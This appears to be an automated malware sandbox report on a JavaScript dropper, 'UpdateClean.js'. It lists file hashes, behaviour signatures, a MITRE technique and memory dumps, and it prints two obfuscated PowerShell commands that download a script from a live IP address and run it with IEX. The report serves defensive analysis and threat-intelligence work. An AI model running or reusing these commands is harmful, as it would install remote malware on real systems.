b3bdd33dcaf6d7453e5aca839f814ba5754b7b4f5b119890c8f4a16bf149c9ad

Analysis

max time kernel
117s
max time network
119s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
25-04-2024 21:57

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

UpdateClean.js
Size

5KB
MD5

d6942e22893e95deea7bbe9d9f9e2a94
SHA1

4d002c2b134d52d0ce8a6715e1ab75b4dd36d4d9
SHA256

b3bdd33dcaf6d7453e5aca839f814ba5754b7b4f5b119890c8f4a16bf149c9ad
SHA512

b1969093839283c68928bd38f8ee0788d85ce71272e18e59316897b223b6d94178464360d7d0e204bd78ea315bfc452607f22a4fbc30686c8439f125124d3b80
SSDEEP

96:rBup4W/ul47KmtSzemZYSBTJABlaxVRo/JR3Ui7RDqG1+qnA++B+k+++8H+e7it5:rBu6W/N+qS1ZjJAixVRo/JR3N7RLr+ru

Score

10^/10

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://77.221.151.31/a/z.png

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://77.221.151.31/a/s.png

Signatures

Blocklisted process makes network request 2 IoCs

Processes:

powershell.exepowershell.exe

flow pid process

5 3012 powershell.exe
6 2480 powershell.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

powershell.exepowershell.exe

pid process

2480 powershell.exe
3012 powershell.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 2480 powershell.exe
Token: SeDebugPrivilege 3012 powershell.exe

flow	pid	process
5	3012	powershell.exe
6	2480	powershell.exe

pid	process
2480	powershell.exe
3012	powershell.exe

description	pid	process
Token: SeDebugPrivilege	2480	powershell.exe
Token: SeDebugPrivilege	3012	powershell.exe

Suspicious use of WriteProcessMemory 6 IoCs

Processes:

wscript.exe

description	pid	process	target process
PID 2176 wrote to memory of 2480	2176	wscript.exe	powershell.exe
PID 2176 wrote to memory of 2480	2176	wscript.exe	powershell.exe
PID 2176 wrote to memory of 2480	2176	wscript.exe	powershell.exe
PID 2176 wrote to memory of 3012	2176	wscript.exe	powershell.exe
PID 2176 wrote to memory of 3012	2176	wscript.exe	powershell.exe
PID 2176 wrote to memory of 3012	2176	wscript.exe	powershell.exe

C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\UpdateClean.js
1⤵
- Suspicious use of WriteProcessMemory
PID:2176
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='(New-Object Net.We'; $c4='bClient).Downlo'; $c3='adString(''http://77.221.151.31/a/z.png'')';$TC=I`E`X ($c1,$c4,$c3 -Join '')|I`E`X
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2480
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='(New-Object Net.We'; $c4='bClient).Downlo'; $c3='adString(''http://77.221.151.31/a/s.png'')';$TC=I`E`X ($c1,$c4,$c3 -Join '')|I`E`X
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3012

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
fee4a643e363bb2997a3fcc51dccc48f

SHA1
73ae7b113e359dc2d9becbb8f5d47b3788c4bd45

SHA256
d20520d27214bfa5de02369fb4245272cc005d1352e1e0c9df2bfed7fdb91429

SHA512
2ef785d4af94324bfe3a3995527841018314269feadc0b0703b3de27a972d3dbf2ae58070a56dda01b0292d97c54441150cdd7f408c5a7146a818592f14feebc

Download Submit
memory/2480-17-0x0000000002B50000-0x0000000002BD0000-memory.dmp

Filesize
512KB

Download
memory/2480-10-0x0000000002990000-0x0000000002998000-memory.dmp

Filesize
32KB

Download
memory/2480-20-0x000007FEF5850000-0x000007FEF61ED000-memory.dmp

Filesize
9.6MB

Download
memory/2480-15-0x000007FEF5850000-0x000007FEF61ED000-memory.dmp

Filesize
9.6MB

Download
memory/2480-16-0x0000000002B50000-0x0000000002BD0000-memory.dmp

Filesize
512KB

Download
memory/2480-14-0x0000000002B50000-0x0000000002BD0000-memory.dmp

Filesize
512KB

Download
memory/2480-19-0x000007FEF5850000-0x000007FEF61ED000-memory.dmp

Filesize
9.6MB

Download
memory/3012-12-0x00000000028A0000-0x0000000002920000-memory.dmp

Filesize
512KB

Download
memory/3012-18-0x00000000028A0000-0x0000000002920000-memory.dmp

Filesize
512KB

Download
memory/3012-13-0x000007FEF5850000-0x000007FEF61ED000-memory.dmp

Filesize
9.6MB

Download
memory/3012-11-0x000007FEF5850000-0x000007FEF61ED000-memory.dmp

Filesize
9.6MB

Download
memory/3012-9-0x000000001B750000-0x000000001BA32000-memory.dmp

Filesize
2.9MB

Download
memory/3012-21-0x000007FEF5850000-0x000007FEF61ED000-memory.dmp

Filesize
9.6MB

Download
memory/3012-22-0x00000000028A0000-0x0000000002920000-memory.dmp

Filesize
512KB

Download
memory/3012-23-0x00000000028A0000-0x0000000002920000-memory.dmp

Filesize
512KB

Download
memory/3012-24-0x000007FEF5850000-0x000007FEF61ED000-memory.dmp

Filesize
9.6MB

Download